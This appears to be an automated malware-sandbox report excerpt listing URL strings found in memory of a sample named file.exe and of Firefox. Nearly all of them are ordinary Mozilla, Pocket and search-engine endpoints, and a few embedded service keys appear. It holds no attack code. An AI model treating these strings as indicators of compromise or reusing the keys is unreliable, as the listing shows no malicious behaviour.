Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9B30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113713962.00001252B7304000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114598645.00002E21BBD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071808582.00000270DB73B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114285473.000020CCD0A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?Z
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s_injectDefaultProtocolHandlersIfNeededresource://gre/modu
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001E.00000003.3010802699.00000270E23BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3111886581.00000270E5C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3101620325.00000270E23D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001E.00000002.3111886581.00000270E5C5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3002701967.00000270DBF4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3101620325.00000270E23D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001E.00000003.3010802699.00000270E23BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3101620325.00000270E23D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114697021.000030E187A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6CB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3069796496.00000270DB244000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabRemove
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001E.00000003.3008852300.00000270E4133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morediscoverystream.spocs-endpoint-query
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreparseGridPositions/gridPositions
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationssection.highlights.includeBookmarksresource://activity-stream/l
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001E.00000002.3104091280.00000270E3FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001E.00000002.3104091280.00000270E3FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001E.00000003.2966388903.00000270DA66B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsMozilla
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E40A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113713962.00001252B7304000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/experimental-features-ime-searchget
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001E.00000003.3008157636.00000270E4186000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitNumber
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001E.00000002.3101394595.00000270E2372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993517878.00000270E238A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001E.00000002.3052198523.00000270DA316000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3052950108.00000270DA46A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
